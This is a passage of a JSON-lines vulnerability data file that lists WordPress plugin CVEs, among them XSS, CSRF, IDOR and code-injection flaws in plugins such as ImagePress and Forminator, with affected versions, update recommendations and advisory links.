Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_post_metadata_html.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_post_metadata_html.php#L23\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_term_metadata_html.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_term_metadata_html.php#L32\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_user_metadata_html.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_user_metadata_html.php#L31\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109558\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109558\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2023-6996","slug":"shortcode-to-display-post-and-user-data","versionImpact":"1.2.1","versionEndExcluding":"1.3.0","description":"The Display custom fields in the frontend \u2013 Post and User Profile Fields plugin for WordPress is vulnerable to Code Injection via the plugin's vg_display_data shortcode in all versions up to, and including, 1.2.1 due to insufficient input validation and restriction on access to that shortcode. This makes it possible for authenticated attackers with contributor-level and above permissions to call arbitrary functions and execute code.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0662c3a-5b82-4b9a-aa69-147094930d1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0662c3a-5b82-4b9a-aa69-147094930d1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2131","slug":"move-addons","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The Move Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's infobox and button widget in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7b6af5a-ad44-4dd6-9ce1-6fcbd28f8ebe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7b6af5a-ad44-4dd6-9ce1-6fcbd28f8ebe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048903%40move-addons&new=3048903%40move-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048903%40move-addons&new=3048903%40move-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47835","slug":"ari-stream-quiz","versionImpact":"1.2.32","versionEndExcluding":"1.3.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ARI Soft ARI Stream Quiz \u2013 WordPress Quizzes Builder plugin <=\u00a01.2.32 versions.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ari-stream-quiz\\\/wordpress-ari-stream-quiz-plugin-1-2-32-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ari-stream-quiz\\\/wordpress-ari-stream-quiz-plugin-1-2-32-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6983","slug":"shortcode-to-display-post-and-user-data","versionImpact":"1.2.1","versionEndExcluding":"1.3.0","description":"The Display custom fields in the frontend \u2013 Post and User Profile Fields plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.1 via the vg_display_data shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve potentially sensitive post meta.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08d43c67-df40-4f1a-a351-803e59edee13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08d43c67-df40-4f1a-a351-803e59edee13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6982","slug":"shortcode-to-display-post-and-user-data","versionImpact":"1.2.1","versionEndExcluding":"1.3.0","description":"The Display custom fields in the frontend \u2013 Post and User Profile Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and postmeta in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3077b84e-87af-4307-83c5-0e4b15d07ff1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3077b84e-87af-4307-83c5-0e4b15d07ff1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9824","slug":"image-gallery","versionImpact":"1.2.2","versionEndExcluding":"1.3.0","description":"The ImagePress \u2013 Image Gallery plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'ip_delete_post' and 'ip_update_post_title' functions in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts and update post titles.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bce6872-34d4-4675-bce9-e1197d801bce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bce6872-34d4-4675-bce9-e1197d801bce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/functions.php#L204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/functions.php#L204\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/functions.php#L214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/functions.php#L214\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9778","slug":"image-gallery","versionImpact":"1.2.2","versionEndExcluding":"1.3.0","description":"The ImagePress \u2013 Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the 'imagepress_admin_page' function. This makes it possible for unauthenticated attackers to update plugin settings, including redirection URLs, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/200b3446-6107-434b-b46d-2078461f3f94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/200b3446-6107-434b-b46d-2078461f3f94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L380\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L380\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L461\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9776","slug":"image-gallery","versionImpact":"1.2.2","versionEndExcluding":"1.3.0","description":"The ImagePress \u2013 Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/655c08e6-4ef2-438e-b381-1bc3748c3771?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/655c08e6-4ef2-438e-b381-1bc3748c3771?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5883","slug":"ultimate-classified-listings","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The Ultimate Classified Listings WordPress plugin before 1.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1894884-c739-4ef4-8d9c-392171ab3d68\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1894884-c739-4ef4-8d9c-392171ab3d68\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2846","slug":"visual-footer-credit-remover","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The Visual Footer Credit Remover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'selector' parameter in all versions up to, and including, 2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081401%40visual-footer-credit-remover&new=3081401%40visual-footer-credit-remover&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081401%40visual-footer-credit-remover&new=3081401%40visual-footer-credit-remover&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fcb65a0-4218-4728-9c29-0d1a03f438a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fcb65a0-4218-4728-9c29-0d1a03f438a6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11415","slug":"wp-orphanage-extended","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The WP-Orphanage Extended plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the wporphanageex_menu_settings() function. This makes it possible for unauthenticated attackers to escalate the privileges of all orphan accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-orphanage-extended\\\/trunk\\\/wp-orphanage-extended-options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-orphanage-extended\\\/trunk\\\/wp-orphanage-extended-options.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194570%40wp-orphanage-extended&new=3194570%40wp-orphanage-extended&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194570%40wp-orphanage-extended&new=3194570%40wp-orphanage-extended&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ed6255-d8df-4f57-961b-1a0c21e352ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ed6255-d8df-4f57-961b-1a0c21e352ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10128","slug":"rt-prettyphoto","versionImpact":"1.2","versionEndExcluding":"1.3","description":"A vulnerability was found in rt-prettyphoto Plugin up to 1.2 on WordPress and classified as problematic. Affected by this issue is the function royal_prettyphoto_plugin_links of the file rt-prettyphoto.php. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.3 is able to address this issue. The patch is identified as 0d3d38cfa487481b66869e4212df1cefc281ecb7. It is recommended to upgrade the affected component. VDB-249422 is the identifier assigned to this vulnerability.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.249422\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.249422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.249422\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.249422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/rt-prettyphoto\\\/commit\\\/0d3d38cfa487481b66869e4212df1cefc281ecb7\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/rt-prettyphoto\\\/commit\\\/0d3d38cfa487481b66869e4212df1cefc281ecb7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7049","slug":"custom-field-for-wp-job-manager","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The Custom Field For WP Job Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2 via the the 'cm_fieldshow' shortcode due to missing validation on the 'job_id' user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to expose potentially sensitive post metadata.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9891587b-2a63-41be-b79d-afe407dd57fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9891587b-2a63-41be-b79d-afe407dd57fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134344\\\/custom-field-for-wp-job-manager\\\/trunk\\\/includes\\\/CFWJM_Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134344\\\/custom-field-for-wp-job-manager\\\/trunk\\\/includes\\\/CFWJM_Shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12522","slug":"yayforms","versionImpact":"1.2.1","versionEndExcluding":"1.3","description":"The Yay! Forms | Embed Custom Forms, Surveys, and Quizzes Easily plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'yayforms' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayforms\\\/tags\\\/1.2.1\\\/yayforms.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayforms\\\/tags\\\/1.2.1\\\/yayforms.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/461ab75a-3ced-4296-9dc1-b8eee17a8299?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/461ab75a-3ced-4296-9dc1-b8eee17a8299?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9346","slug":"video-embed-privacy","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The Embed videos and respect privacy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'v' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/487e5add-726c-4cfc-b86e-bb4eeec168a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/487e5add-726c-4cfc-b86e-bb4eeec168a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-embed-privacy\\\/trunk\\\/preview\\\/preview.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-embed-privacy\\\/trunk\\\/preview\\\/preview.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3162600%40video-embed-privacy&new=3162600%40video-embed-privacy&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3162600%40video-embed-privacy&new=3162600%40video-embed-privacy&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0893","slug":"time-sheets","versionEndExcluding":"1.29.3","description":"The Time Sheets WordPress plugin before 1.29.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd6ef6ee-15e9-44ac-a2db-976393a3b71a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd6ef6ee-15e9-44ac-a2db-976393a3b71a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7389","slug":"forminator","versionImpact":"1.29.1","versionEndExcluding":"1.29.2","description":"The Forminator plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.29.1 via class-forminator-addon-hubspot-wp-api.php. This makes it possible for unauthenticated attackers to extract the HubSpot integration developer API key and make unauthorized changes to the plugin's HubSpot integration or expose personally identifiable information from plugin users using the HubSpot integration.","recommendation":"Update to version 1.29.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d04b822-a48a-485e-b9b5-f5a213307c71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d04b822-a48a-485e-b9b5-f5a213307c71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#scopes\",\"name\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#scopes\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#manage-settings-via-api\",\"name\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#manage-settings-via-api\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047085\\\/forminator\\\/trunk\\\/addons\\\/pro\\\/hubspot\\\/lib\\\/class-forminator-addon-hubspot-wp-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047085\\\/forminator\\\/trunk\\\/addons\\\/pro\\\/hubspot\\\/lib\\\/class-forminator-addon-hubspot-wp-api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6133","slug":"forminator","versionImpact":"1.27.0","versionEndExcluding":"1.28.0","description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient blacklisting on the 'forminator_allowed_mime_types' function in versions up to, and including, 1.27.0. This makes it possible for authenticated attackers with administrator-level capabilities or above to upload arbitrary files on the affected site's server, but due to the htaccess configuration, remote code cannot be executed.","recommendation":"Update to version 1.28.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13cfa202-ab90-46c0-ab53-00995bfdcaa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13cfa202-ab90-46c0-ab53-00995bfdcaa3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.27.0\\\/library\\\/fields\\\/upload.php#L356\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.27.0\\\/library\\\/fields\\\/upload.php#L356\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.27.0\\\/library\\\/fields\\\/upload.php#L372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.27.0\\\/library\\\/fields\\\/upload.php#L372\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2995007\\\/forminator\\\/trunk\\\/library\\\/helpers\\\/helper-fields.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2995007\\\/forminator\\\/trunk\\\/library\\\/helpers\\\/helper-fields.php#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1262","slug":"advanced-google-recaptcha","versionImpact":"1.27","versionEndExcluding":"1.28","description":"The Advanced Google reCaptcha plugin for WordPress is vulnerable to CAPTCHA Bypass in versions up to, and including, 1.27 . This makes it possible for unauthenticated attackers to bypass the Built-in Math Captcha Verification.","recommendation":"Update to version 1.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244677\\\/advanced-google-recaptcha\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244677\\\/advanced-google-recaptcha\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d553aab2-d441-46d6-9c01-5dcfdc48674f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d553aab2-d441-46d6-9c01-5dcfdc48674f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47647","slug":"helpie-faq","versionImpact":"1.27","versionEndExcluding":"1.28","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in HelpieWP Accordion & FAQ \u2013 Helpie WordPress Accordion FAQ Plugin allows Stored XSS.This issue affects Accordion & FAQ \u2013 Helpie WordPress Accordion FAQ Plugin: from n\/a through 1.27.","recommendation":"Update to version 1.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/helpie-faq\\\/wordpress-faq-accordion-docs-helpie-wordpress-faq-accordion-plugin-plugin-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/helpie-faq\\\/wordpress-faq-accordion-docs-helpie-wordpress-faq-accordion-plugin-plugin-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
